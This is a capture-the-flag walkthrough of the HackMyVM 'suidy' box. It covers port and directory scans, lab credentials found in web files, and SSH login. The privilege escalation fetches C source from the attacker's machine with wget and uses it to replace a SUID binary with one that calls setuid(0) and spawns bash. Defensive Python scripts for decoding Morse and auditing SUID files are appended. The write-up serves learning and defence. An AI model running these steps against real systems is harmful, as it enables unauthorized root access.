
HMV-suidy

HMV-suidy target machine walkthrough

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.169 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-09 11:22 CST
Nmap scan report for 192.168.179.169 (192.168.179.169)
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8a:cb:7e:8a:72:82:84:9a:11:43:61:15:c1:e6:32:0b (RSA)
| 256 7a:0e:b6:dd:8f:ee:a7:70:d9:b1:b5:6e:44:8f:c0:49 (ECDSA)
|_ 256 80:18:e6:c7:01:0e:c6:6d:7d:f4:d2:9f:c9:d0:6f:4c (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: AA:6D:30:09:71:E8 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.39 ms 192.168.179.169 (192.168.179.169)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.93 seconds

Web probing

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.169
hi

<!-- hi again -->

Directory scan

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.169 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.179.169
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 22]
/robots.txt (Status: 200) [Size: 362]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.169/robots.txt
/hi
/....\..\.-\--.\.-\..\-.
/shehatesme

The scan turns up a robots.txt. It contains a line of Morse code and a path, /shehatesme; decoding the Morse gives "hi again".
That leaves the second path, /shehatesme, as the target.
Visiting that directory over the web shows a message:

She hates me because I FOUND THE REAL SECRET! I put in this directory a lot of .txt files. ONE of .txt files contains credentials like "theuser/thepass" to access to her system! All that you need is an small dict from Seclist!
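The Morse entry in robots.txt above, decoded with an added script (my own example, not code from the original post). It parses the backslash-separated form used in that file as well as the usual space/slash-separated form, and classifies each robots.txt line as either a plain path or a Morse entry. ROBOTS_SAMPLE is copied from the curl output above; the function names are my own.

```python
import re
from typing import List, Optional, Tuple

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# The three robots.txt lines returned by the target (copied from the curl output above).
ROBOTS_SAMPLE = "/hi\n/....\\..\\.-\\--.\\.-\\..\\-.\n/shehatesme\n"

# An entry is treated as Morse when it consists only of dots, dashes and separators.
MORSE_ENTRY = re.compile(r"^/?[.\-\\/ ]+$")


def decode_morse(text: str) -> str:
    """Decode Morse code. Letters are separated by '\\' or a single space,
    words by '/' or a run of two or more spaces; a leading '/' (the robots.txt
    path prefix) is ignored. Unknown tokens raise ValueError."""
    text = text.strip()
    if text.startswith("/"):
        text = text[1:]
    words = []
    for word in re.split(r"\s*/\s*|\s{2,}", text):
        letters = [tok for tok in re.split(r"[\\ ]+", word) if tok]
        decoded = []
        for tok in letters:
            if tok not in MORSE:
                raise ValueError(f"unknown Morse token {tok!r}")
            decoded.append(MORSE[tok])
        if decoded:
            words.append("".join(decoded))
    return " ".join(words)


def decode_robots_entries(robots_txt: str) -> List[Tuple[str, Optional[str]]]:
    """Return (entry, decoded) for each non-empty robots.txt line; decoded is
    None for ordinary paths and the plaintext for Morse-looking entries."""
    out = []
    for raw in robots_txt.splitlines():
        entry = raw.strip()
        if not entry:
            continue
        is_morse = bool(MORSE_ENTRY.match(entry)) and any(c in ".-" for c in entry)
        out.append((entry, decode_morse(entry) if is_morse else None))
    return out


if __name__ == "__main__":
    for entry, decoded in decode_robots_entries(ROBOTS_SAMPLE):
        print(f"{entry:30} -> {decoded or '(plain path)'}")
```

Running it prints HIAGAIN for the second entry and marks /hi and /shehatesme as plain paths, which is the same conclusion the writeup reaches by hand.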

It tells us to scan inside this directory, and even names the wordlist (a small one from SecLists).

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u 192.168.179.169/shehatesme -w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.179.169/shehatesme
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 229]
/. (Status: 301) [Size: 185] [--> http://192.168.179.169/shehatesme/./]
/search.txt (Status: 200) [Size: 16]
Progress: 11424 / 11425 (99.99%)
===============================================================
Finished
===============================================================
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.179.169/shehatesme/search.txt
jaime11/JKiufg6

That gives a username and password, but logging in with it fails; logging in with the credentials from the /shehatesme message (theuser/thepass) succeeds.

┌──(root㉿kakeru)-[~/tmp]
└─# ssh jaime11@192.168.179.169
The authenticity of host '192.168.179.169 (192.168.179.169)' can't be established.
ED25519 key fingerprint is SHA256:e/Y+QbyX33+qoiZpch9G5Mgf32Y1Cj2eBFPlMp3Qx10.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.179.169' (ED25519) to the list of known hosts.
jaime11@192.168.179.169's password:
Permission denied, please try again.
jaime11@192.168.179.169's password:


┌──(root㉿kakeru)-[~/tmp]
└─# ssh theuser@192.168.179.169
theuser@192.168.179.169's password:
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 27 00:41:28 2020
-bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
theuser@suidy:~$

Privilege escalation

A file under a home directory has the SUID bit set.

theuser@suidy:~$ find / -user root -perm -4000 -print 2>/dev/null
/home/suidy/suidyyyyy
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
suidy@suidy:/home$ cd suidy/
suidy@suidy:/home/suidy$ ls
note.txt suidyyyyy
suidy@suidy:/home/suidy$ cat note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!

-suidy
suidy@suidy:/home/suidy$ file suidyyyyy 
suidyyyyy: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=a68ca005dccaf529f434e0408b05dc8614758fb7, not stripped

The file is an executable that we are allowed to run, and after running it the current user becomes suidy.
Let's download it and take a look locally.

┌──(root㉿kakeru)-[~/tmp]
└─# scp theuser@192.168.179.169:/home/suidy/suidyyyyy .
theuser@192.168.179.169's password:
suidyyyyy 100% 16KB 2.3MB/s 00:00

┌──(root㉿kakeru)-[~/tmp]
└─# strings suidyyyyy
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
/bin/bash
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

The strings include /bin/bash, so the guess is that running it spawns a shell. Open the downloaded copy in IDA to see the exact logic:

int __fastcall main(int argc, const char **argv, const char **envp)
{
    setuid(0x3E9u);      // 0x3E9 = 1001, presumably suidy's uid, since running it lands in a suidy shell
    setgid(0x3E9u);      // same value used as the gid
    system("/bin/bash");
    return 0;
}

It calls setuid and then runs /bin/bash. If the setuid argument could be changed to 0, the result would be a root shell.
So the idea is to write a file with the same logic, replace the original with it, and run it.

suidy@suidy:/home/suidy$ wget 192.168.179.83/tmp.c
--2025-02-09 05:03:33-- http://192.168.179.83/tmp.c
Connecting to 192.168.179.83:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 122 [text/x-csrc]
Saving to: 'tmp.c'

tmp.c 100%[=============================================>] 122 --.-KB/s in 0s

2025-02-09 05:03:33 (1.31 MB/s) - 'tmp.c' saved [122/122]

suidy@suidy:/home/suidy$ chmod +x tmp.c
suidy@suidy:/home/suidy$ cat tmp.c
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */
int main(){
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
suidy@suidy:/home/suidy$ gcc tmp.c -o a

But a direct mv fails with a message that the file is in use by a process: suidyyyyy had already been run, and we were still inside the suidy bash it spawned.
So set the permissions on both files,
exit back to theuser, and then do the replacement.

suidy@suidy:/home/suidy$ chmod 777 a
suidy@suidy:/home/suidy$ cp a /tmp
suidy@suidy:/home/suidy$ mv a suidyyyyy
theuser@suidy:/tmp$ cp suidyyyyy /home/suidy/suidyyyyy
theuser@suidy:/tmp$ cd /home/suidy
theuser@suidy:/home/suidy$ ./suidyyyyy
bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
theuser@suidy:/home/suidy$ ls
a a.c note.txt pspy64 suidyyyyy tmp.c
theuser@suidy:/home/suidy$ ls -al
total 3108
drwxr-xr-x 3 suidy suidy 4096 Feb 9 05:04 .
drwxr-xr-x 4 root root 4096 Sep 26 2020 ..
-rw------- 1 suidy suidy 12 Sep 27 2020 .bash_history
-rw-r--r-- 1 suidy suidy 220 Sep 26 2020 .bash_logout
-rw-r--r-- 1 suidy suidy 3526 Sep 26 2020 .bashrc
drwxr-xr-x 3 suidy suidy 4096 Sep 26 2020 .local
-rw-r--r-- 1 suidy suidy 807 Sep 26 2020 .profile
-rwxrwxrwx 1 suidy theuser 16712 Feb 9 05:04 a
-rw-r--r-- 1 suidy theuser 0 Feb 9 05:00 a.c
-r--r----- 1 suidy suidy 197 Sep 26 2020 note.txt
-rwxr-xr-x 1 suidy theuser 3104768 Feb 5 11:11 pspy64
-rwsrwsr-x 1 root theuser 16712 Feb 9 05:14 suidyyyyy
-rwxr-xr-x 1 suidy theuser 122 Feb 9 05:03 tmp.c
theuser@suidy:/home/suidy$ ./suidyyyyy
root@suidy:/home/suidy# cd /root
root@suidy:/root# ls
root.txt timer.sh
root@suidy:/root#

Done.

Summary: the only interesting part is the privilege escalation: analyse the program that has the SUID bit, then change the setuid value and replace the original file. What makes the replacement work is the root script mentioned in note.txt (timer.sh, visible in /root), which re-applies the SUID bit to whatever file is sitting at /home/suidy/suidyyyyy, as the ls -al listing shows.
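As a defender's counterpart to this writeup, here is an added audit script (my own example, not code from the original post or from the box's author) that spots the condition the escalation relies on: a setuid/setgid file that an unprivileged user can replace, because the file itself is group- or world-writable, because its parent directory belongs to a non-root user, or simply because it sits outside the system binary directories. The sample records are constructed from the ls -al listing above plus a benign /usr/bin/passwd entry for contrast; SYSTEM_DIRS, Entry and the audit_* names are my own.

```python
import os
import stat
from dataclasses import dataclass
from typing import Dict, List

# Where setuid binaries are expected to live on a Debian system (my own list).
SYSTEM_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec")

@dataclass
class Entry:
    path: str
    mode: int    # st_mode-style type and permission bits
    owner: str
    group: str

def parse_mode(perm: str) -> int:
    """Turn an `ls -l` permission string such as '-rwsrwsr-x' into st_mode bits."""
    if len(perm) != 10:
        raise ValueError(f"bad permission string {perm!r}")
    bits = {"d": stat.S_IFDIR, "-": stat.S_IFREG, "l": stat.S_IFLNK}.get(perm[0], 0)
    classes = ((stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR, stat.S_ISUID),
               (stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP, stat.S_ISGID),
               (stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH, stat.S_ISVTX))
    for i, (r, w, x, special) in enumerate(classes):
        rwx = perm[1 + 3 * i:4 + 3 * i]
        if rwx[0] == "r":
            bits |= r
        if rwx[1] == "w":
            bits |= w
        if rwx[2] in "xst":      # lowercase s/t means the execute bit is set too
            bits |= x
        if rwx[2] in "sStT":     # setuid / setgid / sticky
            bits |= special
    return bits

def parse_ls_line(line: str, directory: str) -> Entry:
    """Parse one `ls -al` row for a file listed inside `directory`."""
    perm, _n, owner, group, _size, _mon, _day, _time, name = line.split(None, 8)
    return Entry(os.path.normpath(os.path.join(directory, name)), parse_mode(perm), owner, group)

def audit(entries: Dict[str, Entry]) -> List[str]:
    """One finding per setuid/setgid file that an unprivileged user could replace or
    that lives outside the usual system directories. `entries` is keyed by path and
    should also contain the parent directories so their ownership can be checked."""
    findings = []
    for e in entries.values():
        if stat.S_ISDIR(e.mode) or not e.mode & (stat.S_ISUID | stat.S_ISGID):
            continue
        why = []
        if e.mode & (stat.S_IWGRP | stat.S_IWOTH):
            who = "anyone" if e.mode & stat.S_IWOTH else f"group {e.group}"
            why.append(f"file is writable by {who}")
        parent = entries.get(os.path.dirname(e.path))
        if parent is not None:
            if parent.owner != "root":
                why.append(f"parent directory owned by {parent.owner}, who can rename or replace the file")
            if parent.mode & (stat.S_IWGRP | stat.S_IWOTH) and not parent.mode & stat.S_ISVTX:
                why.append("parent directory is group/world writable without the sticky bit")
        if not any(e.path.startswith(d + "/") for d in SYSTEM_DIRS):
            why.append("outside the standard system directories")
        if why:
            findings.append(f"{e.path} ({e.owner}:{e.group}): " + "; ".join(why))
    return findings

# Constructed sample: the /home/suidy rows come from the `ls -al` listing above
# (after the replacement, once root's script had re-applied the SUID bit); the
# /usr/bin rows are a benign reference entry for contrast.
SAMPLE = {
    "/home/suidy": ["drwxr-xr-x 3 suidy suidy 4096 Feb 9 05:04 .",
                    "-rwsrwsr-x 1 root theuser 16712 Feb 9 05:14 suidyyyyy",
                    "-rwxrwxrwx 1 suidy theuser 16712 Feb 9 05:04 a"],
    "/usr/bin": ["drwxr-xr-x 2 root root 69632 Feb 9 05:04 .",
                 "-rwsr-xr-x 1 root root 63736 Jul 27 2018 passwd"],
}

def audit_sample() -> List[str]:
    entries = {}
    for directory, rows in SAMPLE.items():
        for row in rows:
            e = parse_ls_line(row, directory)
            entries[e.path] = e
    return audit(entries)

def audit_live(root: str = "/") -> List[str]:
    """Run the same checks over a real filesystem (run as root for full coverage)."""
    import grp, pwd
    def entry(path: str) -> Entry:
        st = os.lstat(path)
        return Entry(path, st.st_mode, pwd.getpwuid(st.st_uid).pw_name,
                     grp.getgrgid(st.st_gid).gr_name)
    entries: Dict[str, Entry] = {}
    for dirpath, _dirs, files in os.walk(root):
        try:
            entries[dirpath] = entry(dirpath)
            for name in files:
                path = os.path.join(dirpath, name)
                if os.lstat(path).st_mode & (stat.S_ISUID | stat.S_ISGID):
                    entries[path] = entry(path)
        except (OSError, KeyError):
            continue
    return audit(entries)
```

On the sample, audit_sample() reports exactly one finding, for /home/suidy/suidyyyyy: group theuser can write the file, the parent directory belongs to suidy, and the path is outside the system directories; /usr/bin/passwd is clean. audit_live("/") applies the same rules to a real host, which is the check a root-run script like timer.sh should have failed before ever setting the SUID bit on a file in a user's home.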